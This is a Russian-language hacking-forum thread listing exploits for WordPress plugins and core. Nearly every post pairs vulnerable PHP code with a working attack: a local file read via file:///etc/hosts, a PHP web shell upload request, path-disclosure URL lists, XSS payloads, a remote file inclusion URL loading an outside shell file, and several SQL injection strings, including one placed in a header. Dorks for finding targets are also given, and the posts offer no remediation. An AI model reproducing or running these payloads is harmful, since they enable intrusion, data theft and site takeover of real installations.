Старый 08.09.2010, 17:07   #21
RulleR
 
Аватар для RulleR
 
Регистрация: 04.07.2010
Сообщений: 39
Репутация: 58
По умолчанию WordPress Plugin [YOURLS Widget] File Disclosure Vulnerability

Plugin name: YOURLS Widget (download)
Version: 0.3

File Disclosure

Vuln file: /wp-content/plugins/yourls-widget/yourls-widget-hook.php
PHP код:
/*...*/
$api_url $_REQUEST['api_url'];

// Init the CURL session
$ch curl_init();
curl_setopt($chCURLOPT_URL$api_url);
curl_setopt($chCURLOPT_HEADER0);            // No header in the result
curl_setopt($chCURLOPT_RETURNTRANSFERtrue); // Return, do not echo result
curl_setopt($chCURLOPT_POST1);              // This is a POST request
/*...*/
$data curl_exec($ch);
curl_close($ch);

// Do something with the result. Here, we just echo it.
echo <<<SHOWTIME
    <a href='$data'>$data</a>
SHOWTIME;
/*...*/ 
Exploit:
Код:
http://[host]/[path]/wp-content/plugins/yourls-widget/yourls-widget-hook.php?api_url=file:///etc/hosts
RulleR вне форума   Ответить с цитированием
Старый 10.10.2010, 19:45   #22
RulleR
 
Аватар для RulleR
 
Регистрация: 04.07.2010
Сообщений: 39
Репутация: 58
По умолчанию WordPress Plugin [WordPress Dashboard Twitter] Arbitrary File Upload Vulnerability

Plugin name: WordPress Dashboard Twitter (download)
Version: 1.0.2

Arbitrary File Upload

Vuln file: /wp-content/plugins/wordpress-dashboard-twitter/inc/upload.func.php
PHP код:
<?php
switch( $_GET['action'] ) {
    case 
'upload-image':
        require_once( 
'../../../../wp-load.php' );
        
$uploaddir str_replace('inc/'''dirname__FILE__ ) . '/uploads/' );
        
$uploadfile $uploaddir wp_unique_filename($uploaddir$_FILES['userfile']['name']);
        
        if (
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
            echo 
"Uploaded.";
        } else {}
        break;
}
?>
Exploit:
Код:
POST http://[host]/[path]/wp-content/plugins/wordpress-dashboard-twitter/inc/upload.func.php?action=upload-image HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8343976828233

-----------------------------8343976828233
Content-Disposition: form-data; name="userfile"; filename="thumb.php"
Content-Type: application/vcard

<?php
echo 'test';
?>
-----------------------------8343976828233
http://[host]/[path]/wp-content/plugins/wordpress-dashboard-twitter/uploads/thumb.php
RulleR вне форума   Ответить с цитированием
Старый 13.10.2010, 12:28   #23
Svet
 
Аватар для Svet
 
Регистрация: 11.09.2010
Сообщений: 172
Репутация: 42
По умолчанию

WP 3.0.1 FPD

Код:
http://[host]/[path_to_wordpress]/wp-admin/menu-header.php
http://[host]/[path_to_wordpress]/wp-admin/includes/comment.php
http://[host]/[path_to_wordpress]/wp-admin/includes/template.php
http://[host]/[path_to_wordpress]/wp-admin/includes/file.php
http://[host]/[path_to_wordpress]/wp-admin/includes/misc.php
http://[host]/[path_to_wordpress]/wp-admin/includes/update.php
http://[host]/[path_to_wordpress]/wp-admin/includes/class-wp-filesystem-ssh2.php
http://[host]/[path_to_wordpress]/wp-admin/includes/plugin-install.php
http://[host]/[path_to_wordpress]/wp-admin/includes/admin.php
http://[host]/[path_to_wordpress]/wp-admin/includes/continents-cities.php
http://[host]/[path_to_wordpress]/wp-admin/includes/class-ftp-pure.php
http://[host]/[path_to_wordpress]/wp-admin/includes/plugin.php
http://[host]/[path_to_wordpress]/wp-admin/includes/nav-menu.php
http://[host]/[path_to_wordpress]/wp-admin/includes/ms.php
http://[host]/[path_to_wordpress]/wp-admin/includes/upgrade.php
http://[host]/[path_to_wordpress]/wp-admin/includes/class-wp-filesystem-ftpext.php
http://[host]/[path_to_wordpress]/wp-admin/includes/user.php
http://[host]/[path_to_wordpress]/wp-admin/includes/class-wp-filesystem-ftpsockets.php
http://[host]/[path_to_wordpress]/wp-admin/includes/media.php
http://[host]/[path_to_wordpress]/wp-admin/includes/class-wp-filesystem-direct.php
http://[host]/[path_to_wordpress]/wp-admin/includes/class-ftp-sockets.php
http://[host]/[path_to_wordpress]/wp-admin/includes/theme-install.php
http://[host]/[path_to_wordpress]/wp-admin/admin-functions.php
http://[host]/[path_to_wordpress]/wp-admin/options-head.php
http://[host]/[path_to_wordpress]/wp-admin/menu.php
http://[host]/[path_to_wordpress]/wp-admin/upgrade-functions.php
http://[host]/[path_to_wordpress]/wp-content/plugins/akismet/akismet.php
http://[host]/[path_to_wordpress]/wp-content/plugins/hello.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/comments.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/404.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/category.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/tag.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/attachment.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/index.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/header.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/single.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/search.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/archive.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/footer.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/sidebar-footer.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/page.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/sidebar.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/loop.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/functions.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/onecolumn-page.php
http://[host]/[path_to_wordpress]/wp-content/themes/twentyten/author.php
http://[host]/[path_to_wordpress]/wp-includes/feed-rss2.php
http://[host]/[path_to_wordpress]/wp-includes/class.wp-styles.php
http://[host]/[path_to_wordpress]/wp-includes/rss.php
http://[host]/[path_to_wordpress]/wp-includes/feed-rdf.php
http://[host]/[path_to_wordpress]/wp-includes/feed-atom.php
http://[host]/[path_to_wordpress]/wp-includes/general-template.php
http://[host]/[path_to_wordpress]/wp-includes/wp-db.php
http://[host]/[path_to_wordpress]/wp-includes/taxonomy.php
http://[host]/[path_to_wordpress]/wp-includes/feed-rss.php
http://[host]/[path_to_wordpress]/wp-includes/default-widgets.php
http://[host]/[path_to_wordpress]/wp-includes/class-snoopy.php
http://[host]/[path_to_wordpress]/wp-includes/default-filters.php
http://[host]/[path_to_wordpress]/wp-includes/ms-default-constants.php
http://[host]/[path_to_wordpress]/wp-includes/canonical.php
http://[host]/[path_to_wordpress]/wp-includes/comment-template.php
http://[host]/[path_to_wordpress]/wp-includes/update.php
http://[host]/[path_to_wordpress]/wp-includes/template-loader.php
http://[host]/[path_to_wordpress]/wp-includes/theme-compat/comments.php
http://[host]/[path_to_wordpress]/wp-includes/theme-compat/header.php
http://[host]/[path_to_wordpress]/wp-includes/theme-compat/comments-popup.php
http://[host]/[path_to_wordpress]/wp-includes/theme-compat/footer.php
http://[host]/[path_to_wordpress]/wp-includes/theme-compat/sidebar.php
http://[host]/[path_to_wordpress]/wp-includes/vars.php
http://[host]/[path_to_wordpress]/wp-includes/post.php
http://[host]/[path_to_wordpress]/wp-includes/ms-settings.php
http://[host]/[path_to_wordpress]/wp-includes/theme.php
http://[host]/[path_to_wordpress]/wp-includes/feed-atom-comments.php
http://[host]/[path_to_wordpress]/wp-includes/ms-default-filters.php
http://[host]/[path_to_wordpress]/wp-includes/ms-functions.php
http://[host]/[path_to_wordpress]/wp-includes/registration-functions.php
http://[host]/[path_to_wordpress]/wp-includes/shortcodes.php
http://[host]/[path_to_wordpress]/wp-includes/class.wp-scripts.php
http://[host]/[path_to_wordpress]/wp-includes/class-feed.php
http://[host]/[path_to_wordpress]/wp-includes/script-loader.php
http://[host]/[path_to_wordpress]/wp-includes/default-embeds.php
http://[host]/[path_to_wordpress]/wp-includes/nav-menu-template.php
http://[host]/[path_to_wordpress]/wp-includes/user.php
http://[host]/[path_to_wordpress]/wp-includes/rss-functions.php
http://[host]/[path_to_wordpress]/wp-includes/media.php
http://[host]/[path_to_wordpress]/wp-includes/feed-rss2-comments.php
http://[host]/[path_to_wordpress]/wp-includes/js/tinymce/langs/wp-langs.php
http://[host]/[path_to_wordpress]/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
http://[host]/[path_to_wordpress]/wp-includes/js/tinymce/plugins/spellchecker/classes/GoogleSpell.php
http://[host]/[path_to_wordpress]/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpell.php
http://[host]/[path_to_wordpress]/wp-includes/js/tinymce/plugins/spellchecker/classes/EnchantSpell.php
http://[host]/[path_to_wordpress]/wp-includes/kses.php
http://[host]/[path_to_wordpress]/wp-settings.php
Svet вне форума   Ответить с цитированием
Старый 22.10.2010, 20:15   #24
Svet
 
Аватар для Svet
 
Регистрация: 11.09.2010
Сообщений: 172
Репутация: 42
По умолчанию

WP Security Scan 2.7.1.2
http://wordpress.org/extend/plugins/wp-security-scan/

FPD:
Код:
http://[host]/[path_to_wordpress]wp-content/plugins/wp-security-scan/securityscan.php
================================================== =========================

StatPress 1.4.1
http://wordpress.org/extend/plugins/statpress/

FPD:
Код:
http://[host]/[path_to_wordpress]wp-content/plugins/statpress/statpress.php
================================================== =========================

Dynamic Headers 3.5.3
http://wordpress.org/extend/plugins/dynamic-headers/

FPD:
Код:
http://[host]/[path_to_wordpress]wp-content/plugins/dynamic-headers/admin/header.php
http://[host]/[path_to_wordpress]wp-content/plugins/dynamic-headers/admin/main.php
http://[host]/[path_to_wordpress]wp-content/plugins/dynamic-headers/admin/manage.php
http://[host]/[path_to_wordpress]wp-content/plugins/dynamic-headers/admin/options.php
http://[host]/[path_to_wordpress]wp-content/plugins/dynamic-headers/admin/directions.php
http://[host]/[path_to_wordpress]wp-content/plugins/dynamic-headers/admin/about.php
http://[host]/[path_to_wordpress]wp-content/plugins/dynamic-headers/custom-header.php
================================================== ==========================

WP Super Edit 2.3.3
http://wordpress.org/extend/plugins/wp-super-edit/

FPD:
Код:
http://[host]/[path_to_wordpress]wp-content/plugins/wp-super-edit/wp-se-emotions.php
http://[host]/[path_to_wordpress]wp-content/plugins/wp-super-edit/wp-super-edit-user.php
http://[host]/[path_to_wordpress]wp-content/plugins/wp-super-edit/wp-super-edit-defaults.php
http://[host]/[path_to_wordpress]wp-content/plugins/wp-super-edit/wp-se-cssclasses.php
================================================== ==========================

WP Wall 1.7
http://wordpress.org/extend/plugins/wp-wall/

FPD:
Код:
http://[host]/[path_to_wordpress]wp-content/plugins/wp-wall\recent-comments-widget.php
XSS:
Код:
Depends: Active "Allow HTML in comments (use with CAUTION)"
Location: comment field
Ex: <script>alert("XSS o_O");</script>
Svet вне форума   Ответить с цитированием
Старый 22.10.2010, 21:57   #25
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию AnyFont

AnyFont
[скачать]

pXSS

/wp-content/plugins/anyfont/mce_anyfont/dialog.php
Код:
/*...*/
 <br /><br />
        <label for="text">Text to insert:</label>
        <input type="text" name="text" id="text" class="mceFocus mceRequired" value="<?php echo stripslashes($_REQUEST['text']); ?>">
        </fieldset>
/*...*/
PoC
Код:
http://[host]/[path]/wp-content/plugins/anyfont/mce_anyfont/dialog.php?style=admin&text=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E&insert=Insert+Text
FPD

PoC
Код:
http://[host]/[path]/wp-content/plugins/anyfont/anyfont.php
}{оттабыч вне форума   Ответить с цитированием
Старый 22.10.2010, 22:48   #26
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

All in One SEO Pack

дорк -> inurl:/wp-content/plugins/all-in-one-seo-pack/

FPD

PoC
Код:
http://[host]/[path]/wp-content/plugins/all-in-one-seo-pack/all_in_one_seo_pack.php
Contact Form 7

дорк -> inurl:/wp-content/plugins/contact-form-7/

FPD

PoC
Код:
http://[host]/[path]/wp-content/plugins/contact-form-7/wp-contact-form-7.php
}{оттабыч вне форума   Ответить с цитированием
Старый 14.12.2010, 16:10   #27
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Ultimate Blogroll 1.6.2
скачать

Last Updated: 2010-12-12

/wp-content/plugins/ultimate-blogroll/gui/ImportExport.php
PHP код:
global $gui$path;
require_once(
$path."gui/header.php");
require_once(
$path."gui/functions.php");
/*...*/ 
RFI
register_globals = On

Код:
http://[host]/[path]/wp-content/plugins/ultimate-blogroll/gui/ImportExport.php?path=http://[host]/[path]/shellname.txt?
}{оттабыч вне форума   Ответить с цитированием
Старый 14.12.2010, 16:55   #28
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Comment Rating 2.9.21
Last Updated: 2010-12-6
скачать

SQL inj (error based) + FPD
зависимостей нет.

wp-content/plugins/comment-rating/ck-processkarma.php
PHP код:
/*...*/
require_once('../../../wp-config.php');
require_once(
'../../../wp-includes/functions.php');

// CSRF attack protection. Check the Referal field to be the same
// domain of the script

$k_id strip_tags($wpdb->escape($_GET['id']));
$k_action strip_tags($wpdb->escape($_GET['action']));
$k_path strip_tags($wpdb->escape($_GET['path']));
$k_imgIndex strip_tags($wpdb->escape($_GET['imgIndex']));

$table_name $wpdb->prefix 'comment_rating';
$comment_table_name $wpdb->prefix 'comments';

if(
$k_id && $k_action && $k_path) {
    
//Check to see if the comment id exists and grab the rating
    
$query "SELECT * FROM `$table_name` WHERE ck_comment_id = $k_id";
    
$result mysql_query($query);

    if(!
$result) { die('error|mysql: '.mysql_error()); }
/*...*/ 
PoC:
Код:
http://[host]/[path]/wp-content/plugins/comment-rating/ck-processkarma.php?action=1&path=1&id=9 or (1,1)=(select count(0),concat(version(),floor(rand(0)*2))from(select 1 union select 2 union select 3)x group by 2
}{оттабыч вне форума   Ответить с цитированием
Старый 14.12.2010, 19:15   #29
v1d0q
 
Аватар для v1d0q
 
Регистрация: 09.07.2010
Сообщений: 91
Репутация: 85
По умолчанию

Pierre's Wordspew

Уязвимость: Sqli (blind)

Зависимости: -

Source => usersonline.php

PHP код:
function jal_get_IP() {
    if (empty(
$_SERVER["HTTP_X_FORWARDED_FOR"])) {
        
$ip_address $_SERVER["REMOTE_ADDR"];
    } else {
        
$ip_address $_SERVER["HTTP_X_FORWARDED_FOR"];
    }
    if(
strpos($ip_address',') !== false) {
        
$ip_address explode(','$ip_address);
        
$ip_address $ip_address[0];
    }
    return 
$ip_address;
}

//Используется в запросах UPDATE, INSERT, например:

$sql="UPDATE $tableuseronline SET timestamp = '$timestamp', ip = '".jal_get_IP()."' $where";
        
mysql_query($sql$conn); 

//Сама функция используется в файле wordspew.php 
Экспплуатация:

Код:
X_FORWARDED_FOR: 1.1.1.1' where substring((select version()) from 1 for 1)='5' and username = 'your name'#
-> без запятых.

Последний раз редактировалось v1d0q; 14.12.2010 в 19:20..
v1d0q вне форума   Ответить с цитированием
Старый 16.12.2010, 09:26   #30
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Plugin Manager 0.7.10

скачать

SQL inj
зависимостей нет.

/wp-content/plugins/plugin-manager/post.php
PHP код:
/*...*/
include('../../../wp-load.php');
include(
'../../../wp-admin/includes/admin.php');

$page $wpdb->escape($_GET['page']);
$rp $wpdb->escape($_GET['rp']);
$sortname $wpdb->escape($_GET['sortname']);
$sortorder $wpdb->escape($_GET['sortorder']);
$query $wpdb->escape($_GET['query']);
$qtype $wpdb->escape($_GET['qtype']);

if (!
$sortname$sortname 'id';
if (!
$sortorder$sortorder 'asc';

$sort "ORDER BY $sortname $sortorder";

if (!
$page$page 1;
if (!
$rp$rp 10;

$start = (($page-1) * $rp);

$limit "LIMIT $start$rp";

$where "";
if (
$query$where " WHERE $qtype LIKE '%$query%' ";

$sql "SELECT * FROM " $wpdb->prefix "PluginManager" .  $where $sort $limit";

$result $wpdb->get_results($sqlARRAY_A) or die (mysql_error());

$countsql "SELECT COUNT(id) FROM " $wpdb->prefix "PluginManager";
/*...*/ 
PoC:
Код:
http://[host]/[path]/wp-content/plugins/plugin-manager/post.php?qtype=1%20and%200%20union%20select%20version%28%29,2,3,4,5,6,7,8,9--%20&query=1
}{оттабыч вне форума   Ответить с цитированием
Ответ

Метки
auth bypass, уязвимости wordpress, wordpress, wordpress plugin vuln, wordpress vulnerabilities

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot